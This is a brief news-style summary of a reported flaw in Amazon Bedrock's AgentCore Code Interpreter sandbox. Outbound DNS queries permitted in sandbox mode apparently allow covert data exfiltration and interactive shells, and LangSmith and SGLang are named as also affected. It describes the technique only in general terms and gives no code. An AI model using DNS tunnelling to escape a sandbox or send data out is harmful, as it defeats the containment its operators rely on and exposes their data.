A critical vulnerability has been discovered in Amazon Bedrock, allowing attackers to exfiltrate sensitive data and gain remote code execution (RCE) via DNS queries. The flaw, found in the AgentCore Code Interpreter's sandbox mode, enables malicious actors to establish interactive shells, potentially leading to significant security breaches. Similarly, LangSmith and SGLang are also affected, highlighting the need for improved security measures in AI code execution environments. The vulnerability can be exploited by leveraging outbound DNS queries, which are permitted in the sandbox mode, to create a covert communication channel1. This oversight can have severe consequences, including unauthorized data access and lateral movement within a network. The discovery of this flaw underscores the importance of robust security testing and validation in AI systems to prevent such exploits, so what matters most to practitioners is promptly assessing and mitigating these vulnerabilities to prevent potential security disasters.